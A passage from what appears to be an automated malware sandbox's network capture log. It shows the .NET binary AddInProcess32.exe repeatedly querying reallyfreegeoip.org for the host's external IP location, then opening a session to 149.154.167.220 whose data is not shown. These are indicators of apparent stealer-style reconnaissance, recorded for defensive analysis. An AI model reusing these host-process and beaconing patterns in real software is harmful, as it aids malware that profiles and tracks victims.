69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49746	188.114.96.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:34 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:35 UTC	714	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12393 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xl5rMFg98%2BmR2PBubcQCPi2Gbn2%2Bdf7rI99xtA%2Fz62yuB44x10xNtbCmkiCwkP%2BbmLu4K36Mi6%2BmuI4sYTi%2Bv5F2yHf4Hx22wrrzO6CcPbqel%2FbIxwtXvIYpfJRkaIkRJlbju3mR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a65a98f6a55-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:35 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49748	188.114.96.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:37 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:37 UTC	706	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12396 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NsiAQ%2B8Ela9GzGQfY2rQw6fGE79ZkWndvDJ9Q22ishSwpEnVbf0ANLdMVYNQlffoh36SvdKJHxFrLl%2FoKeErUZk7uXNRuxtB1%2FwupzubQoww3nXhGQDD4ZJZBbSQkMMEY2GLb5Y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a7509614295-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:37 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49750	188.114.96.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:39 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:39 UTC	712	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:39 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12398 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zlIkU8YB0x%2BjRX1AgLkxKcJnl3mtwn85mBTEsFHAjGoh1c6dQH8%2Fqw3rlhRtwQPDjDmpreHXuXsEvFmM2JhzJqqRi%2F8DF55R%2Ba62R7JIpcvMBDz2ZSGtYg%2F%2BxxVaEoShHg3UdHJm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a81db1d1988-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:39 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49753	188.114.97.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:41 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:42 UTC	716	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:42 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12401 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3GjgH%2FGnCpuLn1ubVgEzgCKSjKYuPF8xV5wRUGb4blTni2PEWYWZlMUUV1PbzsS%2FZ1OK20uXgMD2Ewg%2BHFRuJPWd%2FK0PRkNckduBnkO%2Ft%2F%2B01PfiUVMi3vsLstKgTmcz3P2rR%2FWO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a9199848c36-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:42 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49755	188.114.97.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:43 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:43 UTC	706	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:43 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12402 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTHP2zGo5XtTcwjUFOxSJzfIR2WWS1Oqf5Mv5ry31SBPYdwTXkNH8orJsMS0R8GUnTsTXocw%2BVOSVQGL%2Fe1f3OVLf3durNzI4eegvDLmfgQ56tqXdqmJFnRMnG6uHJUBiumY%2FRkx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a9acf490c90-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:43 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49757	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:44 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:44 UTC	704	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:44 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12403 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PV1DHJffp86YlQyoeXPtbWSiOIK4G92tDq4EVzWl3nNXlXm8Tj1P8QKImBzFRIywVYxxFBl%2FEOMhQOjhrs1T5jOsAqAtP85FP26eQPh6ab6hwMmC7VP62W4GKD2Er%2BtzUSqtx7AJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a9f8b513342-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:44 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49758	188.114.97.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:45 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:45 UTC	714	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12404 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TiRQ%2F%2BI3IB8Kro%2FOKB1l7XBeDR8HwFnjmWWtH%2BF5iZetumsjOv72REyRhLsOS51%2BtaSz138lnJG7FViDyITSKi%2BBOQvbnhnzJOg85XrNb9OLZTaKH9v%2F5nifr2iPePoKnXxT5XNh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544aa57daf41e9-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49759	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:45 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:45 UTC	706	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12404 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1f2tc0lPLA3ml8LITv3gChyVKKKKlZGWNA4md%2BuZtaX3G0G7fvbsRVQdvQkpKQtmVJzu7uQSq3eW%2BU7q2VtRfOyTzes0dX6vPQO5wC%2FRfzxsYf9VfKselhiZROWQcld9g1QH6uU4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544aa66f814213-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49763	188.114.97.3	443	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:46 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:46 UTC	708	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:46 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12405 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H18URTkwmMVpo91v3yoGsKFbPS3CKbh9ms90RWTK5RPJheCUDrfuAE3tH2QDJiHa6%2Fij1tF%2B%2ByicOpENLzKfLwfYPhnscmwoI4pwRni8OrJskWGzwu7IcasIyt%2FmHfCoCMcvhCVX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544aafc84a42a0-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:46 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49762	188.114.97.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:46 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:46 UTC	704	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:46 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12405 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FyH0FPgvVtgjZJdeLwrVBwpX6k4KSsrvP6zIE7FVTEJzeWku%2BiNYxPkGYEv1yLghXwzwvAWCK8A2Y5e1IvYUmwgvfkqcHT6zBkORqi8Dx72w7rMbjzu8YqtDdiqz6fG9NWb1ESJs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544aafc9a24401-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:46 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49765	149.154.167.220	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
